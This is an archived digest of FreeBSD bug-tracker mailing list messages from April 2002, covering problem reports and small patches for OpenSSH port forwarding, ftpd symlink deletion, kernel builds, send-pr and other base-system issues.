freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/37244: c2lib port includes vector.h which apparently clashes with C++ "vector" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37244 >Category: misc >Synopsis: c2lib port includes vector.h which apparently clashes with C++ "vector" >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 00:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Clint Olsen >Release: 4.5 >Organization: >Environment: FreeBSD poly.0lsen.net 4.5-RELEASE FreeBSD 4.5-RELEASE #3: Sat Mar 9 23:39:57 PST 2002 root@poly.0lsen.net:/usr/obj/usr/src/sys/POLY i386 >Description: When installing c2lib, vector.h is placed in /usr/local/include. This seems to trip up c++ compiles of other ports since they incorrectly reference this file. I contacted the author about this, and he claims only FreeBSD folks have reported this issue. In C++, it's supposed to now be "vector", not vector.h, right? >How-To-Repeat: >Fix: I moved c2lib header files into their own subdirectory in /usr/local/include. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 2:13:55 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C4CD37B419; Fri, 19 Apr 2002 02:13:53 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J9DrK70313; Fri, 19 Apr 2002 02:13:53 -0700 (PDT) (envelope-from dougb) Date: Fri, 19 Apr 2002 02:13:53 -0700 (PDT) From: Message-Id: <200204190913.g3J9DrK70313@freefall.freebsd.org> To: pekkas@netcore.fi, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/37242: mergemaster from 4.3 -> 4.5 fails due to missing smmsp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mergemaster from 4.3 -> 4.5 fails due to missing smmsp State-Changed-From-To: open->closed State-Changed-By: dougb State-Changed-When: Fri Apr 19 02:13:07 PDT 2002 State-Changed-Why: This is covered in UPDATING, and freebsd-stable, both of which you're supposed to read if you're upgrading your system. http://www.freebsd.org/cgi/query-pr.cgi?pr=37242 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 3:30:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2DBAC37B419 for ; Fri, 19 Apr 2002 03:30:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JAU2S86159; Fri, 19 Apr 2002 03:30:02 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2742E37B416 for ; Fri, 19 Apr 2002 03:28:32 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JASW685838; Fri, 19 Apr 2002 03:28:32 -0700 (PDT) (envelope-from nobody) Message-Id: <200204191028.g3JASW685838@freefall.freebsd.org> Date: Fri, 19 Apr 2002 03:28:32 -0700 (PDT) From: Petr Rehor To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/37245: OpenSSH -R port forwarding works with ssh v1 but not with ssh v2 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37245 >Category: bin >Synopsis: OpenSSH -R port forwarding works with ssh v1 but not with ssh v2 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 03:30:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Petr Rehor >Release: FreeBSD 4.5-RELEASE-p2 i386 >Organization: ICZ Czech Republic >Environment: FreeBSD noc.decros.cz 4.5-RELEASE-p2 FreeBSD 4.5-RELEASE-p2 #0: Fri Mar 8 22:22:02 CET 2002 reho@noc.decros.cz:/usr/obj/usr/src/sys/NOC i386 >Description: OpenSSH 2.9 -R port forwarding works with ssh v1 but not with ssh v2. -L port forwarding works for both protocols. It's fixes in OpenSSH See: http://docs.freebsd.org/cgi/getmsg.cgi?fetch=75341+0+archive/2002/freebsd-security/20020113.freebsd-security http://www.freebsd.org/cgi/getmsg.cgi?fetch=81207+83038+/usr/local/www/db/text/2002/freebsd-security/20020113.freebsd-security Patch available from: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/channels.c.diff?r1=1.109.2.1&r2=1.109.2.2 >How-To-Repeat: ssh -2 -R PORT:localhost:PORT remote >Fix: =================================================================== RCS file: /usr/OpenBSD/cvs/src/usr.bin/ssh/channels.c,v retrieving revision 1.109.2.1 retrieving revision 1.109.2.2 diff -u -r1.109.2.1 -r1.109.2.2 --- src/usr.bin/ssh/channels.c 2001/06/12 22:31:48 1.109.2.1 +++ src/usr.bin/ssh/channels.c 2001/06/21 23:45:23 1.109.2.2 @@ -40,7 +40,7 @@ */ #include "includes.h" -RCSID("$OpenBSD: channels.c,v 1.109.2.1 2001/06/12 22:31:48 jason Exp $"); +RCSID("$OpenBSD: channels.c,v 1.109.2.2 2001/06/21 23:45:23 jason Exp $"); #include #include @@ -773,8 +773,9 @@ rtype = (c->type == SSH_CHANNEL_RPORT_LISTENER) ? "forwarded-tcpip" : "direct-tcpip"; - nextstate = (c->host_port == 0) ? SSH_CHANNEL_DYNAMIC : - SSH_CHANNEL_OPENING; + nextstate = (c->host_port == 0 && + c->type != SSH_CHANNEL_RPORT_LISTENER) ? + SSH_CHANNEL_DYNAMIC : SSH_CHANNEL_OPENING; addrlen = sizeof(addr); newsock = accept(c->sock, &addr, &addrlen); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 6:20: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 84BA437B417 for ; Fri, 19 Apr 2002 06:20:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JDK1337902; Fri, 19 Apr 2002 06:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 12B3837B400 for ; Fri, 19 Apr 2002 06:15:25 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JDFPY36910; Fri, 19 Apr 2002 06:15:25 -0700 (PDT) (envelope-from nobody) Message-Id: <200204191315.g3JDFPY36910@freefall.freebsd.org> Date: Fri, 19 Apr 2002 06:15:25 -0700 (PDT) From: Nino Dehne To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/37250: [PATCH] ftpd(8) cannot delete stale symlinks Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37250 >Category: bin >Synopsis: [PATCH] ftpd(8) cannot delete stale symlinks >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 06:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Nino Dehne >Release: FreeBSD 4.5-RELEASE-p2 i386 >Organization: Clan-Planet GmbH >Environment: FreeBSD [...] 4.5-RELEASE-p2 FreeBSD 4.5-RELEASE-p2 #1: Tue Mar 19 18:17:09 CET 2002 root@[...] i386 >Description: When trying to delete a file via ftp(1) (or any other client, it doesn't matter), ftpd(8) does a stat(2) on the file to verify it's there. However, if the file to delete is a symlink the target of the link gets checked, not the link itself thus making stale links impossible to delete via ftp. This occured when local users had symlinks in their home which point to /usr/local/something but are rendered stale when users log in via ftp (due to using chroot() feature of ftpd(8)). >How-To-Repeat: Create a symlink inside a user's home which points outside of the user's home. Log in as that user via ftp while chroot()'ing him using /etc/ftpchroot. Try to delete said link. This should also work with "ordinary" stale symlinks, i.e. not involving any chroot'ing behaviour of ftpd(8). >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 6:30: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D16437B41B for ; Fri, 19 Apr 2002 06:30:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JDU3Q39630; Fri, 19 Apr 2002 06:30:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 19 Apr 2002 06:30:03 -0700 (PDT) Message-Id: <200204191330.g3JDU3Q39630@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nino Dehne Subject: Re: bin/37250: [PATCH] ftpd(8) cannot delete stale symlinks Reply-To: Nino Dehne Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37250; it has been noted by GNATS. From: Nino Dehne To: freebsd-gnats-submit@FreeBSD.org, ndehne@clan-planet.ch Cc: Subject: Re: bin/37250: [PATCH] ftpd(8) cannot delete stale symlinks Date: Fri, 19 Apr 2002 15:24:18 +0200 >Fix: (hit submit too fast *sigh*. here's the fix) I am no C coder. Reading on stat(2) and lstat(2) makes me think the following patch should work. Please comment. --- ftpd.c.patch begins here --- --- /usr/src/libexec/ftpd/ftpd.c Tue Dec 18 19:35:55 2001 +++ ftpd.c.new Fri Apr 19 13:04:42 2002 @@ -2180,7 +2180,7 @@ struct stat st; LOGCMD("delete", name); - if (stat(name, &st) < 0) { + if (lstat(name, &st) < 0) { perror_reply(550, name); return; } --- ftpd.c.patch ends here --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 11:30:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B39D37B405 for ; Fri, 19 Apr 2002 11:30:17 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JIUHG08068; Fri, 19 Apr 2002 11:30:17 -0700 (PDT) (envelope-from gnats) Received: from scar.jinr.ru (scar.jinr.ru [159.93.25.160]) by hub.freebsd.org (Postfix) with ESMTP id 3529037B405 for ; Fri, 19 Apr 2002 11:29:41 -0700 (PDT) Received: from scar.jinr.ru (localhost [127.0.0.1]) by scar.jinr.ru (8.12.3/8.12.3) with ESMTP id g3JITcmE021260 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Fri, 19 Apr 2002 22:29:38 +0400 (MSD) (envelope-from polzun@scar.jinr.ru) Received: (from root@localhost) by scar.jinr.ru (8.12.3/8.12.3/Submit) id g3JITXLc021213; Fri, 19 Apr 2002 22:29:33 +0400 (MSD) Message-Id: <200204191829.g3JITXLc021213@scar.jinr.ru> Date: Fri, 19 Apr 2002 22:29:33 +0400 (MSD) From: Pizik Ilya Reply-To: Pizik Ilya To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/37257: SMP 4.5 freezes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37257 >Category: kern >Synopsis: SMP 4.5 freezes >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 11:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Pizik Ilya >Release: FreeBSD 4.5-STABLE i386 >Organization: Joint Institute for Nuclear Research >Environment: System: FreeBSD scar.jinr.ru 4.5-STABLE FreeBSD 4.5-STABLE #1: Thu Apr 18 20:42:54 MSD 2002 root@scar.jinr.ru:/usr/obj/usr/src/sys/SCAR i386 Dual P3 1GHz, Asus CUV4X-D, VIA 82C686 ATA100 controller >Description: FreeBSD can freesez in any moment. I can ping it via net, but can not do something else. Localy mashine looks dead - no kbd, mouse actions and no video out, hdd led is inactive. Only reset can solve the problem. >How-To-Repeat: >Fix: It could be ata problem. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 11:50:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3952837B41F for ; Fri, 19 Apr 2002 11:50:34 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JIoY312719; Fri, 19 Apr 2002 11:50:34 -0700 (PDT) (envelope-from gnats) Date: Fri, 19 Apr 2002 11:50:34 -0700 (PDT) Message-Id: <200204191850.g3JIoY312719@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Hiten Pandya Subject: Re: kern/37257: SMP 4.5 freezes Reply-To: Hiten Pandya Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37257; it has been noted by GNATS. From: Hiten Pandya To: Pizik Ilya Cc: bug-followup@FreeBSD.org Subject: Re: kern/37257: SMP 4.5 freezes Date: Fri, 19 Apr 2002 11:42:35 -0700 (PDT) --- Pizik Ilya wrote: > >Description: > FreeBSD can freesez in any moment. I can ping it via net, but can not do > something else. Localy mashine looks dead - no kbd, mouse actions and no > video out, hdd led is inactive. Only reset can solve the problem. Hello Pizik, Could you please supply more information on this defact/problem, such as the dmesg(1) output on the victim system, your kernel configuration file. This will let us debug the problem more efficiently. Please send us the output of the following command: + dmesg -a + You kernel configuration file. Thanks. -- Hiten Pandya -- __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 12:50:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3537737B41B for ; Fri, 19 Apr 2002 12:50:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JJo3W42387; Fri, 19 Apr 2002 12:50:03 -0700 (PDT) (envelope-from gnats) Received: from kabir.zssm.zp.ua (kabir.zssm.zp.ua [212.8.32.6]) by hub.freebsd.org (Postfix) with ESMTP id 285D437B404 for ; Fri, 19 Apr 2002 12:46:40 -0700 (PDT) Received: (from eugene@localhost) by kabir.zssm.zp.ua (8.9.3/8.9.3) id WAA18269; Fri, 19 Apr 2002 22:45:42 +0300 (EEST) (envelope-from eugene) Message-Id: <200204191945.WAA18269@kabir.zssm.zp.ua> Date: Fri, 19 Apr 2002 22:45:42 +0300 (EEST) From: Eugene Polovnikov Reply-To: eugene@kabir.zssm.zp.ua To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.2 Subject: kern/37261: kernel is not linking without "device ether" in the config Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37261 >Category: kern >Synopsis: kernel is not linking without "device ether" in the config >Confidential: yes >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 12:50:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Eugene Polovnikov >Release: FreeBSD 4.5-STABLE i386 >Organization: >Environment: >Description: kernel is not linking without "device ether" in the kernel's config >How-To-Repeat: delete "device ether" and all drivers of ethernet NIC's from kernel's config and try to build new kernel >Fix: --- if.c.old Fri Apr 19 22:29:22 2002 +++ if.c Fri Apr 19 22:29:44 2002 @@ -1599,7 +1599,7 @@ ifp->if_flags |= IFF_UP; ifr.ifr_flags = ifp->if_flags; (*ifp->if_ioctl)(ifp, SIOCSIFFLAGS, (caddr_t)&ifr); -#ifdef INET +#if NETHER > 0 /* * Also send gratuitous ARPs to notify other nodes about * the address change. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 16:53:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6083037B41A; Fri, 19 Apr 2002 16:53:21 -0700 (PDT) Received: (from grog@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3JNrLM91170; Fri, 19 Apr 2002 16:53:21 -0700 (PDT) (envelope-from grog) Date: Fri, 19 Apr 2002 16:53:21 -0700 (PDT) From: Message-Id: <200204192353.g3JNrLM91170@freefall.freebsd.org> To: never@nevermind.kiev.ua, grog@FreeBSD.org, freebsd-bugs@FreeBSD.org, grog@FreeBSD.org Subject: Re: kern/37231: vinum cannot make mirroring on vn(4) devices Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vinum cannot make mirroring on vn(4) devices State-Changed-From-To: open->closed State-Changed-By: grog State-Changed-When: Fri Apr 19 16:49:38 PDT 2002 State-Changed-Why: Pilot error. Responsible-Changed-From-To: freebsd-bugs->grog Responsible-Changed-By: grog Responsible-Changed-When: Fri Apr 19 16:49:38 PDT 2002 Responsible-Changed-Why: grog answered this PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=37231 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 19: 2:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 33DA437B427; Fri, 19 Apr 2002 19:02:15 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K22FZ18662; Fri, 19 Apr 2002 19:02:15 -0700 (PDT) (envelope-from tjr) Date: Fri, 19 Apr 2002 19:02:15 -0700 (PDT) From: Message-Id: <200204200202.g3K22FZ18662@freefall.freebsd.org> To: tim@robbins.dropbear.id.au, tjr@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/36270: join(1) SYNOPSIS and usage() are misleading Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: join(1) SYNOPSIS and usage() are misleading State-Changed-From-To: open->patched State-Changed-By: tjr State-Changed-When: Fri Apr 19 19:01:45 PDT 2002 State-Changed-Why: Committed. http://www.freebsd.org/cgi/query-pr.cgi?pr=36270 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 19:50: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B959937B405 for ; Fri, 19 Apr 2002 19:50:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K2o2b27970; Fri, 19 Apr 2002 19:50:02 -0700 (PDT) (envelope-from gnats) Date: Fri, 19 Apr 2002 19:50:02 -0700 (PDT) Message-Id: <200204200250.g3K2o2b27970@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Tim J. Robbins" Subject: Re: bin/36270: join(1) SYNOPSIS and usage() are misleading Reply-To: "Tim J. Robbins" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/36270; it has been noted by GNATS. From: "Tim J. Robbins" To: bug-followup@FreeBSD.ORG Cc: Subject: Re: bin/36270: join(1) SYNOPSIS and usage() are misleading Date: Sat, 20 Apr 2002 12:16:28 +1000 On Fri, Apr 19, 2002 at 07:02:15PM -0700, tjr@FreeBSD.org wrote: > Synopsis: join(1) SYNOPSIS and usage() are misleading > > State-Changed-From-To: open->patched > State-Changed-By: tjr > State-Changed-When: Fri Apr 19 19:01:45 PDT 2002 > State-Changed-Why: > Committed. I neglected to mention that the fix I committed was not the one suggested in the PR, but rather the opposite. Instead of changing the synopsis to point out that there must be no space between -a and its argument, I made it accept it with a space (per SUSv3). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 20:26: 5 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 88AEF37B404; Fri, 19 Apr 2002 20:26:03 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K3Q3k35875; Fri, 19 Apr 2002 20:26:03 -0700 (PDT) (envelope-from tjr) Date: Fri, 19 Apr 2002 20:26:03 -0700 (PDT) From: Message-Id: <200204200326.g3K3Q3k35875@freefall.freebsd.org> To: tim@robbins.dropbear.id.au, tjr@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/36041: mount_smbfs can't cope without password database Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mount_smbfs can't cope without password database State-Changed-From-To: closed->open State-Changed-By: tjr State-Changed-When: Fri Apr 19 20:25:09 PDT 2002 State-Changed-Why: Fix has been removed from repository. http://www.freebsd.org/cgi/query-pr.cgi?pr=36041 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 20:30:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D321837B41B for ; Fri, 19 Apr 2002 20:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K3U1a36231; Fri, 19 Apr 2002 20:30:01 -0700 (PDT) (envelope-from gnats) Received: from w250.z064001178.sjc-ca.dsl.cnc.net (w250.z064001178.sjc-ca.dsl.cnc.net [64.1.178.250]) by hub.freebsd.org (Postfix) with SMTP id D8B0F37B405 for ; Fri, 19 Apr 2002 20:21:34 -0700 (PDT) Received: (qmail 17209 invoked by uid 1000); 20 Apr 2002 03:21:55 -0000 Message-Id: <20020420032155.17208.qmail@lizzy.catnook.com> Date: 20 Apr 2002 03:21:55 -0000 From: Jos Backus Reply-To: Jos Backus To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: gnu/37267: send-pr does not add domain to the username Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37267 >Category: gnu >Synopsis: send-pr does not add domain to the username >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 20:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jos Backus >Release: FreeBSD 5.0-CURRENT i386 >Organization: CatNook >Environment: System: FreeBSD lizzy.catnook.com 5.0-CURRENT FreeBSD 5.0-CURRENT #18: Mon Apr 15 23:20:45 PDT 2002 jos@lizzy.catnook.com:/disk0/usr/obj/disk0/usr/src/sys/LIZZY i386 >Description: send-pr does not attempt to determine the domain of the system when creating the From: and Reply-To: form fields, forcing the user to add the domain manually. >How-To-Repeat: Run send-pr and observe that the e-mail address in the From: and Reply-To: does not have a domain appended. >Fix: The patch below adds the first domain found in /etc/resolv.conf, when present. --- send-pr.sh.orig Fri Apr 19 20:16:12 2002 +++ send-pr.sh Fri Apr 19 20:16:59 2002 @@ -99,8 +99,9 @@ rm -f $PTEMP fi -FROM="$ORIGINATOR <$LOGNAME>" -REPLY_TO="$ORIGINATOR <${REPLY_TO:-${REPLYTO:-$LOGNAME}}>" +DOMAIN=`test -r /etc/resolv.conf && awk '$1 ~ /(search|domain)/ {print "@"$2; exit}' /etc/resolv.conf` +FROM="$ORIGINATOR <$LOGNAME$DOMAIN>" +REPLY_TO="$ORIGINATOR <${REPLY_TO:-${REPLYTO:-$LOGNAME$DOMAIN}}>" if [ -n "$ORGANIZATION" ]; then if [ -f "$ORGANIZATION" ]; then >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 20:40: 5 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 176DA37B416 for ; Fri, 19 Apr 2002 20:40:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K3e3C37356; Fri, 19 Apr 2002 20:40:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 19 Apr 2002 20:40:03 -0700 (PDT) Message-Id: <200204200340.g3K3e3C37356@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Garrett Wollman Subject: gnu/37267: send-pr does not add domain to the username Reply-To: Garrett Wollman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR gnu/37267; it has been noted by GNATS. From: Garrett Wollman To: Jos Backus Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: gnu/37267: send-pr does not add domain to the username Date: Fri, 19 Apr 2002 23:33:09 -0400 (EDT) < said: > send-pr does not attempt to determine the domain of the system when > creating the From: and Reply-To: form fields, forcing the user to add > the domain manually. It's the job of the MUA/MSA to do that. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 20:50: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 307B837B41A for ; Fri, 19 Apr 2002 20:50:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K3o3H38378; Fri, 19 Apr 2002 20:50:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 19 Apr 2002 20:50:03 -0700 (PDT) Message-Id: <200204200350.g3K3o3H38378@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jos Backus Subject: Re: gnu/37267: send-pr does not add domain to the username Reply-To: Jos Backus Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR gnu/37267; it has been noted by GNATS. From: Jos Backus To: Garrett Wollman Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: gnu/37267: send-pr does not add domain to the username Date: Fri, 19 Apr 2002 20:41:11 -0700 On Fri, Apr 19, 2002 at 11:33:09PM -0400, Garrett Wollman wrote: > It's the job of the MUA/MSA to do that. You mean by rewriting those fields? I guess that makes sense. Jos To Unsubscribe: send mail to majordomo@FreeBSD.org with 